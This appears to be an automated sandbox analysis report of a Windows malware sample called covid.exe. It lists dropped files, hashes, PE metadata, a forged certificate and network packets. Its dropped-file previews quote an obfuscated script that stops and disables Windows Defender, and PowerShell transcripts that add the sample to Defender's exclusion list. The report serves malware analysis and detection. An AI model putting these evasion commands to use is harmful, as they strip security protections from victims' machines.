                                                                MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                Malicious:false
                                                                Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                C:\Users\user\AppData\Local\Temp\803d86f9-e660-44ff-a9e1-ff85b73ae661\41c37f5f-e2a1-423e-b793-6cf7f8d71535.exe
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):91000
                                                                Entropy (8bit):6.241345766746317
                                                                Encrypted:false
                                                                SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qfokoedf.q1p.ps1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smbn3d1y.f3r.psm1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tym2jct4.dby.psm1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xz5qrnxd.rfa.ps1
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview: 1
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.YAHSjSYP.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.361307632295367
                                                                Encrypted:false
                                                                SSDEEP:96:BZ4x6qZN4dqDo1ZObCZ+6qZN4dqDo1ZZMyOyUyjZH6qZN4dqDo1ZuJyEyEyNZ+:sl6
                                                                MD5:B4B02164A6FA467E0AE696445D0B6B26
                                                                SHA1:513BEE9D426B22C7CADAB0C99DFCC402B808D470
                                                                SHA-256:3A0D47EEE921355FB29411527205FA13A7A7B7C40D4849007FB54EE75AAA9EF8
                                                                SHA-512:4993411E98C6724182B2EE4C222E867DA2642A06619B7F4C2E7BC0721CC9BE5EDB6DC9B6E1EACC62AB58C2F4DE5F5BAA7F02544E919E2D7B1F627479E7B3A56C
                                                                Malicious:false
                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230005..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6176..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230005..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230526..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\Documents\20210420\PowerShell_transcript.715575.kuWr1X7Z.20210420225944.txt
                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):5805
                                                                Entropy (8bit):5.359309757879457
                                                                Encrypted:false
                                                                SSDEEP:96:BZp6qZN4z3qDo1ZVCZO6qZN4z3qDo1ZWMyOyUyjZS6qZN4z3qDo1ZqJyEyEykZ2:4s+x
                                                                MD5:21CE8E1B82258946100644140B7013C5
                                                                SHA1:619FF53A089FA62422ABC029F72C14667F6D749F
                                                                SHA-256:C38AF2408E89FDF430986EC182AFEA49CD22E63B23649D142256895FC1EA7188
                                                                SHA-512:9B37B7B06EC5E9FD029B56FE9214AFA38A208E312A8F78E6465D2B25010E1602CD82AEB022F7F8655F0385EBF8661643C4E22F2C9042247B525DE8FF58C41721
                                                                Malicious:false
                                                                Preview: .**********************..Windows PowerShell transcript start..Start time: 20210420230002..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..Process ID: 6196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210420230002..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\covid.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210420230320..Username: computer\user..RunAs User: DESKTOP-716T
                                                                C:\Users\user\MhpbFtoGWNhTPjKfwzuGgRGxjpGzfVWGJwHUxEjlTdnPIXFwm
                                                                Process:C:\Users\user\Desktop\covid.exe
                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):2679790
                                                                Entropy (8bit):3.071546356466385
                                                                Encrypted:false
                                                                SSDEEP:12288:HOgjCfV50UYJ9zyVM8f92Ev+EZBQth8tCFiAdA9JW21OgjCfV50UYJ9zyVM8f92T:HdNYRXv6iT1dNYRXv6iTS
                                                                MD5:1F6602BC19F05B583F8EC310007B038B
                                                                SHA1:F7DC5C858BEBD19F80EF0969308758283D4B5B56
                                                                SHA-256:85709EC49736BD005624D4B542222DAAE924D277AD468B21FF2775674CEEE5CA
                                                                SHA-512:69D60D9F5BFA84BA3664B6E135739A5FE3F52C2F5F0C7FF88B4A2198CE8C257251B5EA74514460CA24E46098BA0136AE9F7330E7522849B2A749CBF6FBC34356
                                                                Malicious:false
                                                                Preview: SS Of yQQ f F f f f Q f f f exx exx f f yCQ f f f f f f f wQ f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f yeC f f f yQ Fy yCw yQ f yCf O efx FF yCQ y Sw efx FF CQ yfQ yfx yyx Fe yye yyQ yyy yfF yyQ OS yfO Fe OO OS yyf yyf yyy yyw Fe OC yfy Fe yyQ yyS yyf Fe yfx yyf Fe wC SO CF Fe yfO yyy yff yfy Qw yF yF yf Fw f f f f f f f Cf wO f f Sw y F f OS yFC yxC eew f f f f f f f f eeQ f FQ f yy y Cf f f we C f f w f f f f f f eFC OF C f f Fe f f f Ow C f f f f yw f Fe f f f e f f Q f f f f f f f w f f f f f f f f ywf C f f e f f f f f f e f Ow yFF f f yw f f yw f f f f yw f f yw f f f f f f yw f f f f f f f f f f f yxe OF C f CF f f f f Ow C f CC F f f f f f f f f f f f f f f f f f f f yeC C f ye f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f f Fe f f C f f f f f f f f f f f C Fe f f Se f f f f f f f f f f f Qw yyw yfy yef yyw f f f eQQ wy C f f Fe f f f we C f f e f f f f f f f f f f f f f f Fe f f Ow Qw yyQ yyx y

                                                                Static File Info

                                                                General

                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):5.605387718409897
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:covid.exe
                                                                File size:39624
                                                                MD5:99e3b458dee79b33209d39d19692ae08
                                                                SHA1:63b68db39d6e39be7564b2fb28f1a3070b127444
                                                                SHA256:87bb35a04c91b5005806b4893ad4dc594c8b73d228150597cde89b39f79af9b0
                                                                SHA512:79c087ff41871e03523feee4eee606f27bc59c5213c259df713f1fc0bc860b7846757136ce8b9a9755210aa38192c813eb87131afcaa18c5dec0b5d70060a3a4
                                                                SSDEEP:384:6pJWGVGYxA5sJ8wCo9GTqsm3bdioR+BA8Z/itiB6j4lsTgR8engVEWfNpi/wOpzA:0LX9XbdM56wWoyey/Vcrpti6lhMx
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@............."...0..|............... ........@.. ...............................'....@................................

                                                                File Icon

                                                                Icon Hash:00828e8e8686b000

                                                                Static PE Info

                                                                General

                                                                Entrypoint:0x409ace
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0xFBC3D040 [Wed Nov 7 21:27:28 2103 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:v4.0.30319
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                Authenticode Signature

                                                                Signature Valid:false
                                                                Signature Issuer:C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 4/19/2021 9:43:47 AM 4/19/2022 9:43:47 AM
                                                                Subject Chain
                                                                • C=szVxyAJUgIO, S=QvMaHIZFeWiNZAyrVgOHIpUEkCsLuXNwCwUaECN, L=SAEPLQtKwrCubzBCvJwUGhgHcpoX, T=UEtlUJxBQgjRpnGwZ, E=xQHJQVqKtSlzrhrjyJrHlhDanRcPfDgugHLaHeHSgJM, OU=yNwtfMPSCcaHazxQc, O=vcpjxmifdFnpQfuePNDGSWKiRoN, CN=FwqAJuZxZSRovPsSYLDKNCRckToEsjfnIDTIKgxPlafxXyd
                                                                Version:3
                                                                Thumbprint MD5:05B1F24EB4299E74171523A6BAE99247
                                                                Thumbprint SHA-1:9220EF39055DD6D18D9B7A41230CEAA4F76B5358
                                                                Thumbprint SHA-256:41523B79D33BAD1F3D99CB31EEABD79B3B6F28E870E01800A08B4C5B36B5FEEF
                                                                Serial:00B8BEE23D8FB88CA889DAD9E6D2F8C69D

                                                                Entrypoint Preview

                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al

                                                                Data Directories

                                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x9a78           0x53          .text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa000           0x588         .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0x8600           0x14c8        .text
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc000           0xc           .reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                Sections

                                                                Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy          Characteristics
                                                                .text   0x2000           0x7ad4        0x7c00    False     0.413904989919   data       5.18958268075    IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                .rsrc   0xa000           0x588         0x600     False     0.412109375      data       4.00563976551    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc  0xc000           0xc           0x200     False     0.044921875      data       0.0815394123432  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                Resources

                                                                Name         RVA     Size   Type                                                                        Language  Country
                                                                RT_VERSION   0xa0a0  0x2fc  data
                                                                RT_MANIFEST  0xa39c  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                Imports

                                                                DLL          Import
                                                                mscoree.dll  _CorExeMain

                                                                Version Infos

                                                                Description       Data
                                                                Translation       0x0000 0x04b0
                                                                LegalCopyright    Copyright 2021
                                                                Assembly Version  1.0.0.0
                                                                InternalName      ahmed.exe
                                                                FileVersion       1.0.0.0
                                                                CompanyName
                                                                LegalTrademarks
                                                                Comments
                                                                ProductName       ahmed
                                                                ProductVersion    1.0.0.0
                                                                FileDescription   ahmed
                                                                OriginalFilename  ahmed.exe

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                Timestamp                             Source Port  Dest Port  Source IP       Dest IP
                                                                Apr 20, 2021 22:59:11.631361008 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:11.684120893 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.684290886 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:11.684930086 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:11.737579107 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937634945 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937678099 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937705040 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937730074 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937752008 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937766075 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:11.937773943 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937797070 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:11.937799931 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:11.937844992 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.198029995 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.198069096 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.198093891 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.198117971 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.198215961 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.199172974 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.199203968 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.199322939 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.200407982 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.200443983 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.200520039 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.201627970 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.201658010 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.201726913 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.202872038 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.202903032 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.202970028 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.204102993 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.204137087 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.204205036 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.205338955 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.205370903 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.205456018 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.206574917 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.206608057 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.206665993 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.207807064 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.207839012 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.207930088 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.209031105 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.209063053 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.209140062 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.210285902 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.210319996 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.210378885 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.211505890 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.211539030 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.211630106 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.212704897 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.212738037 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.212824106 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.213963985 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.213995934 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.214071989 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.215200901 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.215233088 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.215316057 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.216418028 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.216451883 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.216502905 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.217673063 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.217705011 CEST  80           49702      172.67.220.147  192.168.2.7
                                                                Apr 20, 2021 22:59:12.217761993 CEST  49702        80         192.168.2.7     172.67.220.147
                                                                Apr 20, 2021 22:59:12.218903065 CEST  80           49702      172.67.220.147  192.168.2.7
